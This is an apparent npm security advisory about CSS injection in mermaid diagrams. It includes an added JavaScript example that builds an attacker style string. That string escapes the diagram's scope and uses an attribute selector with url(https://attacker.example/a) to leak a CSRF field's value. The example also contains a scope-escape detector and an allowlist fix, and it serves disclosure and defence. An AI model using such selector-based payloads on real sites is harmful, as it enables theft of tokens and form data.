Possible injection of arbitrary `CSS` into the generated graph, affecting the container HTML
- Severity:
- Medium
Description
An attacker is able to inject arbitrary CSS into the generated graph. Because the injected rules are not confined to the graph, the attacker can change the styling of elements outside the generated graph and potentially exfiltrate sensitive information from the containing page by using specially crafted CSS selectors (for example attribute selectors that match on an element's value and trigger a request to an attacker-controlled URL).
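The following is an added example, not mermaid's own code, showing the failure mode the description refers to: a renderer scopes user-supplied style text under the diagram's id, but concatenates it verbatim into a `<style>` block, so a closing brace lets the attacker start a new rule that matches elements anywhere in the page. The renderer model, the function names, the diagram id `g1` and the attacker input are all constructed for illustration; the hardened builder at the end shows one allowlist-based fix, which is not necessarily the fix applied in mermaid 9.1.2.

```javascript
// Added example, not mermaid's code. Names (buildStylesUnsafe, buildStylesSafe,
// diagram id "g1") are hypothetical; the attacker input is constructed.

// Constructed model of a renderer that scopes user styles under the diagram's
// id but concatenates the user-controlled text verbatim.
function buildStylesUnsafe(diagramId, userStyle) {
  return `#${diagramId} .node { ${userStyle} }`;
}

// Constructed attacker input: the closing brace ends the scoped rule, and the
// remainder becomes a second rule. Its attribute selector matches a field
// outside the diagram whose value starts with "a", and the background image
// makes the browser fetch an attacker URL only when it matches. One such rule
// per candidate prefix is the classic selector-based CSS exfiltration.
const attackerStyle =
  'fill:#f00 } input[name="csrf"][value^="a"] { background: url(https://attacker.example/a) ';

// Minimal rule splitter, sufficient for the flat stylesheets built here:
// returns the selector of every "selector { declarations }" rule.
function listSelectors(css) {
  return css
    .split('}')
    .map((chunk) => chunk.split('{')[0].trim())
    .filter((selector) => selector.length > 0);
}

// Selectors not anchored under the diagram's id can style, or probe,
// elements in the surrounding document. Returns those selectors.
function rulesEscapingScope(css, diagramId) {
  const scoped = new RegExp(`^#${diagramId}(?![\\w-])`);
  return listSelectors(css).filter((selector) => !scoped.test(selector));
}

const ID_RE = /^[A-Za-z_][\w-]*$/;
// property:value with a strict value allowlist: no braces, semicolons,
// quotes, parentheses or colons may appear in the value.
const DECL_RE = /^([a-zA-Z-]+)\s*:\s*([\w#%. -]+)$/;

// Hardened builder: accept only comma-separated "property:value" pairs whose
// characters come from the allowlist above. The user text can then neither
// close the rule nor introduce url() or attribute selectors. Functional values
// such as rgb() are rejected as well; that is the trade-off of an allowlist.
function buildStylesSafe(diagramId, userStyle) {
  if (!ID_RE.test(diagramId)) {
    throw new Error(`unsafe diagram id: ${diagramId}`);
  }
  const decls = userStyle
    .split(',')
    .map((s) => s.trim())
    .filter((s) => s.length > 0)
    .map((decl) => {
      const m = DECL_RE.exec(decl);
      if (!m) throw new Error(`rejected style declaration: ${decl}`);
      return `${m[1]}:${m[2].trim()}`;
    });
  return `#${diagramId} .node { ${decls.join(';')} }`;
}

// Demonstration on the constructed input.
const unsafeCss = buildStylesUnsafe('g1', attackerStyle);
console.log('selectors emitted:', listSelectors(unsafeCss));
console.log('rules escaping the diagram:', rulesEscapingScope(unsafeCss, 'g1'));
console.log('hardened, benign input:', buildStylesSafe('g1', 'fill:#f9f,stroke:#333,stroke-width:4px'));
try {
  buildStylesSafe('g1', attackerStyle);
} catch (e) {
  console.log('hardened, attacker input:', e.message);
}
```

The check that matters in review is `rulesEscapingScope`: any selector the diagram emits that is not rooted at the diagram's own id is reachable from page content, and a single stray `}` in user text is enough to produce one. The allowlist builder closes that path by construction rather than by trying to strip known-bad sequences.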
Recommendation
Update the mermaid package to version 9.1.2 or a later compatible version. The version details are as follows:
- Affected version(s): >= 8.0.0, < 9.1.2
- Patched version(s): 9.1.2
References
Related Issues
- jsondiffpatch is vulnerable to Cross-site Scripting (XSS) via HtmlFormatter::nodeBegin - CVE-2025-9910
- Mermaid improperly sanitizes sequence diagram labels leading to XSS - CVE-2025-54881
- Mermaid does not properly sanitize architecture diagram iconText leading to XSS - CVE-2025-54880
- Astro allows unauthorized third-party images in _image endpoint (GHSA-xf8x-j4p2-f749) - CVE-2025-55303
- Tags:
- npm
- mermaid
Last updated on July 21, 2023